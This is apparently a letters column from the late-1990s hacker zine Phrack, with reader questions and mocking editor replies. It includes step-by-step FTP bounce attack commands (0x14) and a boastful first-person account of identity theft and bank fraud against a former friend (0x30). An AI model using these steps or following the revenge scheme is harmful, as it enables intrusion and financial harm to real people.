+the annual "good kid's" Six Flag trip and that REALLY pissed me off.
+        Then, as the first period teacher begins to yell something like "Get
+to work!" (I am in shop first period) I wake up and realize I had been
+thinking. Most of the period I will talk to my friends about hacking (the
+two-maybe three-friends I have in that class) and they will ask me computer
+questions and I will answer them (and if I don't know an answer I will make
+one up, after all, they have no idea how to use a computer to its full
+limitations).
+        After a few more minutes of thinking I realize a virus will be the way
+to go. The only problem is putting it on the computer. How? Well, maybe if I
+can get access to a teacher's computer while she/he is out of the room. Yeah,
+that would be the only way. But the witnesses  (who am I kidding the kids up
+there would LOVE to see the computers crash, in fact, I have been offered
+$$$MONEY$$$ to crash em).   I think about the virus idea for a moment. Yeah,
+that is the way to do it. First period is over. I move to my second class. It
+is a no brainer (on both of the days) and I have a lot of time to plot out my
+plan. Trojan Horse. Yes, or maybe Darth Vader...as a calling card. Yeah, that
+would be the way to go. The Trojan Horse virus followed up by the Darth Vader
+virus. Yes. Well,
+    I have one of those two. Now lets think here. How to gain access to the
+computer at school.  The teacher looks at me and tells me to "get to work!"
+and I look at him/her and reply, "But I am already finished!" and they leave
+me alone. But, maybe I should wait until I am in High School (when the entire
+district will have the internet) and I could port in and leave the virus.
+Yeah, that would work, I couldn't be blamed since I wouldn't go to the Middle
+School any longer. That is a possibility.
+        I cheat at my math for a while (copying the back of the book for some
+easy answers) not because I am dumb, hell no, I am in Algebra I in the 8th
+grade for Christ's sake! No, I am just lazy, except when it comes to the
+computers. Second period is over.
+        I walk to my third class of the day, an hour till lunch when I get to
+talk to my ENTIRE 5 friends at one time (there are some almost friends in this
+group, people I get along with and, yes, on occasion like to hang around with).
+You see, I am a "nerd" and proud to be one! Now, this is the thing. I am not
+just ANY nerd, I am a nerd with RED hair and fairly THICK glasses with THICK
+frames (I want contact lenses that have mirrored silver on the outside but I
+am not allowed to have them for some fucking unknown reason).
+        I do my work, hoping that lunch will come, and eventually it does. I
+walk down the halls meeting a friend or two along the way, getting pushed by
+hicks that don't think computers are "cool". (Just as something that made
+people think I did a speech in Drama class on how computers are gonna crash in
+2000 because of the Millenium Bug. One kid almost pissed in his pants when I
+told them safty systems on Nuclear power plants might go offline and how that
+all cars with electronic timers that shut down until an inspection won't run.
+Plus power might go out, I think that made them appreciate computer freaks
+like you and me just a LITTLE more since WE are the only ones that can save
+them from that hideous fate!!)
+        I am laughed at because I run and internet Star Wars club (The
+Conflict at www.geocities.com/Area51/Zone/9875 ). But they don't laugh when I
+tell them I can hack into the school's computers. They look at me dumbfounded
+and then make some smart ass remark. I look at them for a second and walk away,
+I know they don't understand how much of a computer GENIUS I am.  Well, to tell
+the truth I am NOT really a computer GENIUS. Well, in some ways I am. I mean I
+CRAVE knowledge like I CRAVE food when I am hungry and water when I am thirsty.
+        I can't get enough computer knowledge, I ALWAYS need more (currently I
+am learning C, C++ JAVA, JAVAScript, Visual Basic, and QBasic <----I forgot
+most of what I used to know on that one)
+        I eat my lunch (usually Nachos but sometimes Lays potato chips and an
+ice cream) and then go outside where I get an RC Cola. The bell rings and we
+are all herded back inside the main building where we suffer out the rest of
+the day.
+        I make it past the rest of 3rd with no problem. Then comes fourth. It
+is a little nerve racking to sit there while time slowly slips by, waiting for
+that bell to ring so that you can be set free of this hellish place.
+        The bell rings and I leave the school, heading outside where the buses
+load. Mine is the last and after an hour or waiting it arrives (thank GOD I am
+the first one off) and I go inside my nice, cool house. I turn my computer on
+(if it is off) and begin my homework (I lie about having homework so that I
+can play on the computer without being touched by my mother). I wash the
+dishes and water the dogs. Then I sit down and play on the computer a little
+bit.
+        I get on the internet a little while later. I learn a LITTLE more
+hacking and play some games over the internet (ain't technology wonderful???).
+I am far from being an 31337 hacker, but I am doing some good a little. I am
+basically a newbie but I can still hack Novell (childs play).
+        After a while of this I take a shower and lie down in bed, dreading
+the next day (unless, of course, it is a weekend).
+
+        And that, is my Non-Life.
+
+[ ATTN DELIQUENT PARENTS: Increase Ritalin by 1201293 mg/Kg. ]
+
+0x11>-------------------------------------------------------------------------
+
+Dear sir,
+  First off, i think phrack is a wonderful publication, the best of its
+kind and better than most, if not all, of the computer related
+commercial publications.  You and your staff are doing a great job and
+please keep up the excellent work :)
+
+[ So, we're better then 2600.  Thanks!  *That's* the validation we needed! ]
+
+  That said, i have a request.  I'm writing a paper on the hacking
+subculture and such a project would be, to say the least, severely
+lacking without the inclusion of groups like Phrack Inc., 10pht, and
+
+[ Phrack is not incorporated.   And you mean `l0pht`. ]
+
+r00t.  So i would greatly appreciate it if you could fit it into your
+
+[ You are already severely lacking.  You failed to mention the guild.  You 
+  even forgot b0w. ]
+
+doubtless busy schedule to send me a history of Phrack.  It can be as
+brief or as in-depth as youd like.  From just the date of creation and
+pivotal events in Phrack history to a summary of every passing member's
+contributions to the publication.. anything you can send will be an
+asset to me.  Also, if you or any of your staff members would be so
+
+[ I'll get some of my interns right on that.  Alhambra!  Get to it! ]
+
+gracious and godly-wonderful as to answer the few questions below that
+would also be greatly, GREATLY appreciated.
+
+Q: What is your most commonly used handle and why did you choose it?
+
+[ `route`.  Cos I thoroughly route my foes.  And also cos I route through all
+  my girlfriends' purses when they are in the bathroom. ]
+
+Q: What is your position at Phrack?
+
+[ I AM PHRACK. ]
+
+Q: When did you realize you were a hacker(or phreaker, cracker,
+whatever applies to you)?
+
+[ It is something you are born with.  It is not something you learn.  There 
+  is no single moment of realization.  It is something you just `are`.  It
+  is this unexplicable and inexorable pursuit of knowledge.  To learn.  To
+  break.  To fix.  To push.  To optimize.  To learn.  To hack. ]
+
+Q: What do you think hacking is Really about?
+
+[ Oh c'mon man.  Chicks and Money.  That's what it ALL boils down to. ]
+
+Q: How do you think the 'scene' has changed, and where would you like
+to see it go?
+
+[ See P48-02a ]
+
+Q: If you could say anything to the community at large about hacking,
+what would it be?
+
+[ Um.  Most of what you people consider hacking is simply a justification or 
+  shield for doing illegal acts. ]
+
+   One last thing, do you know where(email, www address, whatever) i
+could contact current or former members of 10pht, r00t, or any real
+
+[ Um.  Let's see.  http://www.l0pht.com.  http://www.r00t.org.  And so on.
+  You're not a very smart person. ]
+
+group (ie: not one of the lame new groups trying, unsuccessfully, to
+copy the greatness of the older groups)?
+   Any response, including negation so i can search elsewhere, would be
+greatly appreciated.  Thank you for your time.
+
+Weaver
+
+0x12>-------------------------------------------------------------------------
+
+Is it possible to "Hide" your ip while on tcp/ip connection
+
+if so how?
+
+Thanx
+
+[ Yes, look into Onion Routing. ]
+
+0x13>-------------------------------------------------------------------------
+
+Hi Phrack-editors,
+
+I'm looking for a good and experienced hacker to hack a German site.
+There is enough money involved to satisfy you.
+
+[ My price is quite high.  Actually, fuck it.  I don't want money.  Give me
+  flesh and fame.  Get me some elite movie role where I am the hero and Milla 
+  Jovovich is my love interest.  Then we'll talk. ]
+
+I will give your more information with further correspondence.
+
+Please let me know soon if you are interested, (just reply to this
+usa.net address), thank you,
+
+Diogenes
+
+0x14>-------------------------------------------------------------------------
+
+I recently read about the ancient ftp bounce attack.  I have tried it and
+it works on versions of ftp that are lower than wu-2.4.2.  Here's what I
+do.
+
+[Receiving Machine no system req's except write access]
+TYPE I
+PASV (Give's IP then port)
+STOR
+
+[Sender Machine w/ver 2.4 or lower]
+TYPE I
+PORT <reciever's IP and port that was shown in the PASV command's output>
+RETR <filename>
+
+[Receiving Machine]
+Binary Mode Transfer Started
+
+It then goes on to get the file.
+
+But...
+
+If it is a wu-2.4.2 ver computer, the sender machine says Illegal PORT
+Command, when you type the IP and port of the receiving computer.  You can
+only do a PORT command that includes the IP address that I am coming from.
+Sorry to say I don't know how to do any kind of source route or IP
+spoofing, although I'd be interested to hear if this was the only answer,
+and am not sure if there is a way to get around this.
+
+0x15>-------------------------------------------------------------------------
+
+how can I phreak succsesfully in Germany???
+
+[ The Germans hated me when I was there.  I think they hate all Americans. 
+  Something to do with WWII or something I guess. ]
+ 
+0x16>-------------------------------------------------------------------------
+
+Hello there :)
+Probably u don't know who I am ...
+
+[ Definitely. ]
+
+well, I'm an italian boy and I wish to say ya one thing ...
+You're Great.
+
+[ Oh.  C'mon now...  Really? ]
+
+I've just start to reading Phrack (the last issues) and I guess that it's
+a very cool wonderful zine.
+
+[ Get out.  You think so? ]
+
+Why am I tell ya this ??
+Well, since I think that one person is as ya ... well he's great.
+
+[ Now stop that.  I'm really getting embarassed. ]
+
+I'm trying to learn something from ya (and I shall overcome .... I hope :) )
+I'm interesting in hacking .. but I'm not like some other ppl that always ask
+"How can I be an hacker ??" "where I can find something to became root"
+I guess that they haven't understood nothing
+The REAL HACKER (for me) is an expert, has an etic and he hack to learn
+The knowledge is one of the thing most important in the world (the other ones
+are the GIRLS =) )
+So I won't ask ya how to be an hacker ... (even cause you'll propbably say me 
+FUCK YOU ;) )
+we're so far but maybe one day we could meet :) to share our knowledge
+
+[ Wait a minute.  Are you coming on to me? ]
+
+Well, Thanx a lot and excuse me for all the time you spent to read this letter
+Excuse me also for my terrible english
+
+[ NP.  Luckily Aleph1 was over, so he translated for me (`course, then I 
+  needed someone to translate that, too). ]
+
+Cool and great stuff has Phrack =)
+
+[ Agreed.  Great stuff has Phrack.  ]
+
+0x17>-------------------------------------------------------------------------
+
+Hi, i noticed that you fixed up your web page, and thats nice, but my
+probelm is, that when i downloaded the phrack 51 issue, it came like this :
+ "  phrack51.tar.gz   "  so,....what kind of program do i use to open it?
+Can you just put all issues in zip format? That would help us all!
+
+[ 'Us all'?  You are of course refering to the entire moron population.  
+  Phrack does not cater to the morons of the world, sorry.  Try 2600.  I hear 
+  their target audience is a bit thicker skulled. ]
+
+0x18>-------------------------------------------------------------------------
+
+Hi,
+
+I sent you an email a while back asking you to forward a message to
+an author of one of your articles, since he wanted to remain anonymous.
+However I never got any reaction either from the author or from you.
+It's really important for me that I find him to discuss some
+techicalities.
+
+The article was; "How to make your own telecards"
+                 Volume Seven, Issue Forty-Eight, File 10 (and 11) of 18
+
+Did you manage to send the email off to him successfully?
+
+All I want is for him to contact me on this address (raven@swipnet.se).
+If he wants to remain anonymous he could easily create an email account
+on www.hotmail.com or another service of that kind.
+
+It would be very nice of you to forward this email to the author of
+the article and reply to me wether it was sent successfully or if it
+bounced back.
+
+thanks           
+
+[ This is the best we can do. ]
+
+0x19>-------------------------------------------------------------------------
+
+Hey there... is there any way to get phrack in just one big file instead of
+getting it in a lot of separate files?  Thanks...
+
+Thanks,
+
+Crystalize
+
+[ `cat phrack* > master_phrack.blob` ]
+
+0x1a>-------------------------------------------------------------------------
+
+im having trouble finding uk phreak iNfOs! can u help me out? im looking 4
+bt c7 info and uk payphones. cheers
+
+[ Hrm.  I know several Brits who like me tho.  And I like them, too.  Much
+  more then the Germans.  The .uk girls are waaay prettier too. ]
+
+0x1b>-------------------------------------------------------------------------
+
+HELP>  Your the Best I need your help FAST
+
+[ AHM THE BEST!@ ]
+
+I have 2 files in Corel Word Perfect 7.0 that have pass words on them I
+need the Fast Can you help? Or know anyone who can?
+
+I'm in the U.S.
+
+[ Great.  We're practically neighbors then. ]
+
+I will pay I hear your one of the Best out there :-)
+
+[ AHM THE BEST!@ ]
+
+Melissa
+
+P.S.I need to try to get these by Sun. Night I can e-mail them to you?
+
+[ Hrm.  `Melissa` huh...  Hrm..  You'd better bring them over, this could 
+  take a while. ]
+
+0x1c>-------------------------------------------------------------------------
+
+Just wondered why everyone raves about PGP, even thogh it's breakable.
+
+[ What the hell are you talking about? ]
+
+Is it possible to by-pass 'Proxy blocks' on an internet connection? The local
+iNet connection has blocks on all hack/warez sites whereby when you try and
+access them you get a 'You're trying to access a filtered URL' message. I
+figured it would be possible to re-route the conneciton but haven't a clue
+how.
+
+[ Shure.  Try some covert tunneling via IP fragmentation or IP-IP. ]
+
+Also, how do you find out all this stuff about tapping phones, cell-net
+busting and telephone, errr, dabbling?? Do you research it yourself or just
+accumulate it form others?
+
+[ Everything I know about phones is self-taught. ]
+
+Many thanks,
+Denyerec
+
+0x1d>-------------------------------------------------------------------------
+
+Hi,
+    I've been reading a-lot of phrack zines lately and seeing your name
+in most of them, I thought your the best to answer my questions ???
+
+    To become a hacker where do I start ?
+
+[ New Zealand.  Or at least as far away from CA as possible. ]
+
+    What books should I read ?
+
+[ Anything by Stevens/Knuth or any of the millions of smarter-then-you people 
+  out there.  It's a safe bet that, if they wrote a book, they're smarter then 
+  you.  Very safe bet.  Like, Fort Knox safe. ]
+
+    What languages do I have to learn ?
+
+[ English is a good start. ]
+
+    Which sites are the best to go to for information on hacking
+(including newsgroups)    ?
+
+[ Anything in the alt.* hierarchy is a good plan.  It's ALL *choice* 
+  material. ]
+
+    I've only started hacking and that's into applications on my
+computer and my friends computers.
+
+[ That's nice. ]
+
+    I hope I'm not bothering you with this message.
+
+[ No bother at all.  I'm shure you've made someone smile, somewhere. ]
+
+0x1e>-------------------------------------------------------------------------
+
+Dear Phrack,
+I'm looking for a phreak to work in France and I couldn't find such
+informations on the Net; so, is there any chance that blue box may work in
+France, or the Phoney app which comprise red, bleu, green, and black boxes,
+and if so it is, how does it work ?
+Also, there is any site on the Net where I can find informations and tools
+for phreak in France?
+
+                Thank you so lot by advance for your advices.
+
+[ Now, I don't know any French people, but, I think if I met some, they 
+  would like me.  I don't give into all that `French people suck` propaganda.
+  Nono.  I think they rock.  And the French women are really pretty, too. ]
+
+0x1f>-------------------------------------------------------------------------
+
+I use a macintosh when I ip spoof. Please, if you use a macintosh, send
+me a hacked version of TCP/IP an/or a hacked version of Open Transport.
+thanks.
+
+[ You're neat.  Let's be pen-pals. ]
+
+0x20>-------------------------------------------------------------------------
+
+Hello!
+
+Sorry for borring you, but I've some problems with L2 on FreeBSD-2.2.1R
+and decide to ask you about some tech details.
+
+The problem is that 'loki' unable to receive ICMP_ECHO packets from
+'lokid'. I dig through kernel netinet sources and AFAIK, there is no way
+to pass ICMP_ECHO packets to userland. In ip_icmp.c we have:
+
+
+ICMP_ECHO->icmp_input()->icmp_reflect()->ICMP_ECHO_REPLY->icmp_send()->net
+
+So, there is no chance to receive ICMP_ECHO in application program, isn't
+it?! Unfortunately, I've no access to Linux box, so I can see what's
+hapen there.
+
+[ You are correct.  In the accopmanying paper I allude to this problem.  Net/3
+  based stacks will not pass ICMP request packets to userland. ]
+
+Is there are any workarounds? I can patch my kernel, but I think this is
+not right way. What do you think about this?
+
+[ Running the client and daemon on Net/3 boxes is a problem. ]
+
+p.s. The idea of patch is simple - create copy of packet's mbuf via
+m_copy(), send it to rip_output() and only after that pass original packet
+to icmp_reflect(). 
+
+[ Cool!  Write the patch up and I'll publish it in a future issue. ]
+
+Regards, Roman.
+
+0x21>-------------------------------------------------------------------------
+
+I would like to put a request out for all so called "hackers" to join up i
+can't find nobody to talk to in this Hellhole Richmond,Virginia I want to put
+a message up for all VA area code 804 hackers that live near richmond to
+email me at DrMischief@juno.com . ThanX
+
+ThanX,
+Mischief
+
+ALIAS: DrMischief
+
+[ Here's your chance. ]
+
+0x22>-------------------------------------------------------------------------
+
+Let me start by saying your magazine is great. I read it whenever I have
+time. I am a newbie and want to know if you know anyone who could help me
+get started who lives/operates in the Morris County, NJ area.
+
+                        ~The Gator
+
+P.S. If you know anyone using the handle 'The Gator', can you please tell
+me so I don't offend anyone. 
+
+[ You mean you haven't checked in the official codename repository?  Oh boy.
+  I don't envy you.  `The Gator` is one of the most sought after nicks in the
+  history of nicks!  You're in for it now.  God help you. ]
+
+0x23>-------------------------------------------------------------------------
+
+Hello!
+        Thanks for such a good e-zine. It has a lot of relevant articles,
+and it helped me start hacking. Again. thanks for that.
+        I was wondering one thing, however: do you know onything about the
+Mentor? He wrote the Hacker MAnifesto, and I believe he wrote an article for
+phrack once...... Could you give me any help, please? I'm dong this for a
+school project....
+
+[ I hear the mentor joined a new wave band and changed his name to Bobbysox. ]
+
+0x24>-------------------------------------------------------------------------
+
+Where can I find a sshd.c trojan?
+
+[ http://www.cs.hut.fi/ssh/#current-version ]
+
+0x25>-------------------------------------------------------------------------
+
+I'd like to know if someone of you ever made some compiling in
+C (I'd like something for you) thank's
+
+[ Huh? ]
+
+0x26>-------------------------------------------------------------------------
+
+Hi, I need a FALSE IP APP: Can You Help ME?
+
+[ NO I can't HELP you AT all. ]
+
+0x27>-------------------------------------------------------------------------
+
+I heard about Phrack magaine issue talks about hijacking sessions, which
+one is that issues? I can't find it.
+
+[ P50-06 ]
+
+0x28>-------------------------------------------------------------------------
+
+I'm trying to reach all the real hackers and phreaks (not stupid warez
+lamers) in the 601 area code, especially those around Lauderdale county,
+so I figured Phrack would be a good place to start.
+
+A few friends and I are gonna be starting some get-togethers at the new
+Bonita Lakes Mall in Meridian when it opens up later this October
+(probably long past by the time the issue of Phrack this will be in
+comes out).
+
+All fellow readers interested in reviving the HP scene in the East
+Mississippi-West Alabama area are welcome to come (reviving assumes that
+there was ever a scene here in the first place.  We're quite boring
+hicks in this part of the country).
+
+If you're planning on coming, or want more info, please E-Mail me at
+weaselsoftware@hotmail.com
+
+Even if we just have the locals, we should have a lot of fun, so if all
+goes well, I just might be writing an article for Phrack about it, if
+ya'll would be interested.
+
+[ We would'nt be.  Ya'll. ]
+
+Cheers,
+-|/|/easel  
+
+0x29>-------------------------------------------------------------------------
+
+I'v have a few questions about Juggernaut:
+
+1) can it capture ethernet packet ?
+
+[ It can capture many. ]
+
+2) can it act like sniffer ?
+
+[ Shure. ]
+
+3) which compiler
+
+[ GNU C compiler ]
+
+4) does it have to run on root
+
+[ No, it has to run as root. ]
+
+5) which plateform does it work on?
+
+[ Linux (legacy version) Linux, BSD, Solaris (current unreleased version) ]
+         
+0x2a>-------------------------------------------------------------------------
+
+  You could say I'm a newbie or novice.  I would be very greatful if you
+could send info on anything on beginning hacking.  Like what computers are
+the best and what additional accessories you need.  So in short please send
+any info you could.  Thanks.
+
+[ WHAT AM I DOING?  I AM PUBLISHING PHRACK.  WHAT IS PHRACK ABOUT?  PHRACK
+  IS ABOUT DISSEMINATING ENTROPIC INFORMATION TO ANYONE WHO WANTS IT.  ARE
+  YOU CONFUSED?  IT WOULD APPEAR SO. ]
+
+0x2b>-------------------------------------------------------------------------
+
+I have heard about your magazine. I am not new but I am not experienced
+to this side. Would you please guide me to where I would begin.
+        pool
+
+[ P51-02@0x2a ]
+
+0x2c>-------------------------------------------------------------------------
+
+Kong-ratz Guyz! You made it onto C|NET Last night at 10 on (Sept) the 5th. 
+They were bashing you! Damn..... Well thats it. C-ya!
+
+[ Hrm. ]
+
+0x2d>-------------------------------------------------------------------------
+
+    After reading Phrack for years and being in the computer industry for 
+18+ years, I thought it was time that I write in.  I have been reading Phrack
+for about 6 years now.  Even talked to Erik Bloodaxe a few times in
+regards to Banyan Vines a couple of years ago when I was in the military.
+The scene seems to have changed so much now.  It used to be full
+disclosure for the most part.  Now everyone is so paranoid of sharing what
+they know, since everyone will rush a patch out for the latest exploit.
+How do you think others learned?  Hacking is and always will be about
+exploring the limits of systems and networks.  As you learn and share,
+others can expand their knowledge base.  I started back on Atari 400s
+years ago coding in BASIC.  I know many will laugh at that very thought,
+but it was a start.  The groups back then were very tight, but also
+willing to help each other.  If you showed a willingness to learn, and
+took the time to learn, instead of just leeching, it was amazing what
+others would do to help you.
+
+    I have been digging through tons of sites lately, most are outdated hacks 
+from what I have seen.  Most places patch as fast something hits the `Net.  
+But at least you can learn from the code if you take the time.  I want to 
+sends congrats out to Phrack.  You guys along with a handful of others make it 
+a point to keep sending things out to us in the community.  One of the 
+comments I am sure to hear is, then why don't you contribute things?  I have 
+not to Phrack directly, but that will change soon.  I don't have a lot that is 
+that great, that hasn't been patched for already.  Mine is more tinkering and 
+learning.  Anyway, I am sure I have rambled enough for now.  Just thought I 
+would give my $.02 worth.  Keep up the good work at Phrack!
+
+L8R,
+
+D-Man
+
+0x2e>-------------------------------------------------------------------------
+
+I am looking for a REALLY good telenet software and an also REALLY good
+
+[ I like the telnet software that comes with 4.4BSD. ]
+
+scanner software. Can you refer me anywhere?
+
+[ Scanners was a terrifiing movie!  Why would you want to scan someone?!@ ]
+
+    I also would like to know how you decode the password in the passwd
+file.
+For example it writes:
+
+                john: x :9999 :13: John Johnson:/home/dir/john:/bin/john
+
+[ 'x' is a shadow password token.  It cannot be decrypted.  Futhermore:
+  Unix passwd encryption is based on a modified version of DES.  The user
+  enters her login and password at the prompts.  The user entered password is
+  used as a key to encrypt a 64-bit block of NULLs.  The first seven bits of
+  each character are extracted to form a 56-bit key.  (The other eight are
+  used for parity.) This implies that only eight characters are significant to
+  a password.  The E-table is then modified using the salt, which is a 12-bit
+  value, coerced into the first two chars of the stored passwd.  The salt's
+  purpose is to make precompiled passwd lists and DES hardware chips
+  ineffectual (or more difficult to use).  Then, DES is invoked for 25 
+  iterations on the block of zeros.  The output is 64-bits long, and is then
+  coerced into a 64 character alphabet (0-9, A-Z, a-z, ".", "/").  This
+  involves translations in which several different values are represented by
+  the same character.  Unix passwd crypts are the product of a one-way hash.
+  Information about the key is dropped in every iteration.  Bits are LOST in
+  the process.  crypt(3), therefore, CANNOT be decrypted, reversed, or
+  otherwise subverted from any type of scrutiny of it's output. ]
+
+
+0x2f>-------------------------------------------------------------------------
+
+To the Editor:
+
+    I have to give out props to the job done on Phrack51.....it just keeps
+getting better and better. Iv'e enjoyed Phrack 1-50 but i must say that since
+the current staff of the mag took over iv'e really noticed a marked
+improvement in the qaulity and content of the articles.  Thanx for making this
+magazine available to all of us out here who are reading and learning But just 
+one thing wheres my pics of Mila Jovavich in the nude!!!!!!
+
+NMEwithin   
+
+[ http://www.infonexus.com/~daemon9/PIX/milla4.jpg ]
+
+0x30>-------------------------------------------------------------------------
+
+a story of adolencent revenge..by a not so adolencent at 3:37 am
+
+[ Be warned.  This is long. ]
+
+So here i sit surrounded by an ashtray full of butts, empty beer cans, empty 2
+liters, a giant pile of papers, a stack of cd's, dirty dishes, tangled cords,
+red and green lights, the ticking of the furnace and blurred vision. Just got
+back from the pool hall and pissed off. why? because an old friend is getting
+married tomorrow and I was not invited. Well WAS a friend is more to the point.
+Betrayal in any form is a great primer for hatred. I am a twenty something
+(hate that fucking phrase) loser with no clue on what the future holds..but I
+find pleasure in figurative masterbation with MY processor. Match wits with
+this bitch, tell IT what to do and make it my slave...cheap thrill.  Having
+power over something or someone is great while it lasts..as long as you do not
+have a concience. But I was wronged, so it is justified..my actions I mean...
+right? My girlfriend is asleep upstairs and thinks I sit up a nights doddeling
+to porn sights. I tell her that my pc is not working right, so that is why I am
+always working on it...that fucker bill gates.  If he was a smart as the world
+beleives he is, these activities would not be so easy. Back to the point.
+(sorry! had a few too many). So I sign on...search for allies, find them among
+other assholes that have somehow learned one of my handles. My buddies are up
+to some funny shit, not total anarchy, but funny none the less. So what do I
+do...I tell them that I am in a bad state of being at the moment..they ask why,
+"Time for pain!" is what I read. You know how it is. A friend since first
+grade on through college just fucked you for the 100th time. I feel sick about
+it, but none the less it's time to put to work the tricks of the trade. I give
+my TRUE friends the skinny on my intentions, they ablige with laughter and
+frothing mouths. I cough up his SS#, home, phone, bank, work, license, and
+online accounts. Too late to turn back now. It's funny how one will actually
+take the gas pipe for virtual strangers that one has formed an online bond
+with, and will enlist them in a sceme to fuck a real time friend. (ex-friend).
+Number one, divide up the tasks. Number two, failure is NOT an option. N!umber
+three, ruin wedding. So here we go...secretary of state was a blow off, no
+brainer. PhoneCo a bit tougher (but been there before). Bank..oh the bank..
+online banking 24/7 was such a good idea. My collective cohorts and I were
+like pitbulls fighting over the neighbors cat. Giggeling like schoolgirls. HEY
+we are elite! or so we think..most of our shit (not all) was built by others
+before us. We did modify code, but the backbone was not our own. Now it is
+4:30 am and the shit is flying...after reading the "underground" being a
+martyr seems cool. My head is spinning, but I have to remain focused at all
+times..it is hard. Account activity...money is due to the banquet facility
+tomorrow. At least the balance of the shindig after the initial deposit. Check
+numbers and cleared transactions. He has no fucking clue! The best part was
+that he had mentioned writing a check for his balance only one day before....
+but the amount owed was not cleared yet on his account. So time to insert!
+ --0.00 balance. Too easy. OK, fine. Just a bounced check to deal with. Phones
+turned off (schedualed termination for lack of response to notices sent). Oh
+yeah..did I mention Utilities? Bank takes care of payment...how convenient.
+Car payments, insurance, mortgage the whole nine. Zip, Zero, Zed. A repeater.
+Constant (0.00). I am an asshole, I know, but being fucked by a 'FRIEND" is
+troubeling and unforgivable in this situation. One more thing..Company Voice
+mail...fucked. Left a text to speech recording to boss, too funny and
+implicating to dillhole. It's like giving beavis and butthead a small piece of
+gray matter that works for only bad things. I should of been invited to this
+wedding, but never the less, he is marrying a whore. This may sound vindictive
+or like sour grapes, but totally true. So actaully we are doing him a service,
+he just does not know it. The "ruin the wedding" part is actually out. It will
+happen and the avalanche of our actions will not start until the following
+week. But at least i did something, right? What a stupid thing to concentrate
+on. I am an idiot with things I should not have. Most of my collective friends
+are striking political targets...I am bouncing a check. But I am over it now.
+Time to sit back and wait...wait for the phone call from a mutual friend to
+give me the dirt. I guess I am the type of guy that would get a boner if I
+reset his sprinkler timer to go off when he is trying to get in his car.
+Totally retarded, but I would laugh for days. Whats wrong with me? I am now
+sitting here in my self-made dungeon scratching my head saying to myself "boy
+that was way harsh". I know some people would pose the question, "what did he
+do to desrve this type of retaliation?". You know what it's like, you have
+been there at one time, and everyone reaches a point where counter measures
+are warranted. Case closed. What we did was but an inconvenience, but will be
+remedied. Nothing was left beyond repair. It's at these times! (no matter how
+trivial) you find out who is willing to take a bullet for you. And in some
+fucked up way, that is important. At least it is to me. it's 7:49 am and time
+for the sandman.
+
+SychoSiS - The Collective.
+
+[ I am not sure which saddens me more, the fact that you actually spent several
+  hours writing this, or the fact that I spent several minutes reading it.  Now
+  Phrack's loyal readers can feel my pain and read this for themselves. ]
+
+0x31>-------------------------------------------------------------------------
+
+To whom it may concern:
+
+I believe that I submitted an article to your publication on hacking the
+phones at your local WAL~MART, please be advised that I submitted the
+same article to 2600 magazine and blacklisted 411, however I submitted
+the article to 2600 magazine before yours or blacklisted, they have
+decided to publish my article, and there fore I wish to inform you of
+this so there is no confusion.
+
+Thank you for your attention,
+
+Pirho
+--
+Brought to you by Pirho and the International Brother Hood Of Frat
+Houses.
+
+[ We can only hope that your article brings Emmanuel and the rest of the 2600
+  editorial team as much amusement as it brought us.  Not from going and
+  harassing people at Walmart, no.  Mostly from laughing at you for writing 
+  it.  We'll leave the articles on hacking things like Walmart and Disney 
+  World for publication by 2600.  We like to think we still have a reputation 
+  for quality. -alhambra ]
+
+0x32>-------------------------------------------------------------------------
+
+Dear..sir
+    I had readed yours doc.I'm interesting
+about hacking art and learing it.I would like
+to ask you.How can I hack my ISP?It's dumbing
+I know.But I don't know to ask anybody.
+
+[ I wonder if the aleph1speak to English translator has a `Yoda setting`... ]
+
+0x33>-------------------------------------------------------------------------
+
+Hey, I just finished a two hour picture tour at your webpage, looked at
+every single photo on that hosted there, I know for one thing, with all the
+film you have used, Kodak must love you! The pic's were a riot, matter of
+fact, I almost had an accident in my pants I was laughing so hard. Seam's
+
+[ Maybe you should get some rubber pants or those adult diapers. ]
+
+like you and your friends know how to have fun (my kind of people) all we
+have up here is half-wit clowns. Anyway, enuf with the bullsh*t,
+I just wanted to ask you who owns "INN", if it is you, how did you pay for
+all that hardware? Where are you located, Cali I assume? How old are you?
+Any chance of meeting somewhere to chat one day (IRC)? 
+If it's to personal, I understand, if not, reply..
+
+[ Are you coming on to me? ]
+
+
+Regards  -Tyrant  
+
+0x34>-------------------------------------------------------------------------
+
+[ ...Regarding the 'Teardrop' IP fragmentation bug... ]
+
+Dear To whom it concearns,
+ 
+        I do not think you should have posted this about your bug you found.
+Alot of maniacs got a hold of it and are crashing servers everywhere. The
+net has turned into anarchy. I have about 4 servers down that i patched. But
+
+[ The Internet is anarchistic by nature. ]
+
+the patch doesnt seem to work.
+
+[ The patch works fine.  Perhaps it is you that is broken? ]
+
+I do not think you should have posted that publically like that. 
+
+[ Thanks.  I'll make sure to file your opinion in the ignorance-folder. ]
+
+
+0x35>-------------------------------------------------------------------------
+
+I'm just wondering when is defcon and where can I find out about little
+bit more?
+Regards.
+Pav.
+
+[ Defcon is traditionally held during the Summer in Sin City.  Damn I love
+  that town.  http://www.defcon.org for more info, although the future of 
+  this Con is in question. ]
+
+0x36>-------------------------------------------------------------------------
+
+    Where can I find ways to make Long Distance phone calls without getting 
+billed (and prefferably without making any boxes?)  
+
+[ A phone line for which you do not pay the bill. ]
+
+I'm not an idiot, I just thought I'd ask.  :)
+
+[ Is that open to conjecture? ]
+
+0x37>-------------------------------------------------------------------------
+
+To Whom It May Concern:
+
+     I enjoy reading your stuff in Phrack and I pay attention to those stuff 
+that is writen about unix reading stuff.  I am just wonder if there is any way
+to play tricks or hack linux 1.2.13.  It also runs pine under it and I think
+there is a trick with .rhosts in pine and ls /tmp. Could you please tell me 
+more stuff about this??  I could download the /etc/passwd file but then I have
+to use a dictionary to hack it and is there away of hacking it without using a
+dictionary?? And how do I delete my last login file?? Thanks!!
+
+Your Truly
+
+Tag 
+
+[ Linux 1.2.13 is one of most inpenetrable versions of Unix out there today.
+  Not only is the Linux O/S reknown for its stalwart and inpenetrable security
+  but the 1.2.13 kernel was where Alan, Eric, Linus and the rest of crew 
+  peaked.  That kernel revision is all-but immune to every known form of
+  attack (with the possible exeception of quantum state disassembly).  Your 
+  best bet is to kill yourself now. ]
+
+0x38>-------------------------------------------------------------------------
+
+How ye all doin there at Phrack, hope your all keepin well.
+
+Anyways before I say anything I'll admit it, I'm a newbie, not a lamer a
+newbie. I've read all the hacking files I can get my hands on. There's only
+one small problem...I live in Ireland. A few weeks ago I was given an article
+written by "Hackwind" (1992 I think) about the hacking scene in Ireland.
+Believe you me. It's even worse than he says it is. The main problem is that
+all the files written don't relate to Ireland in any way . I don't even know
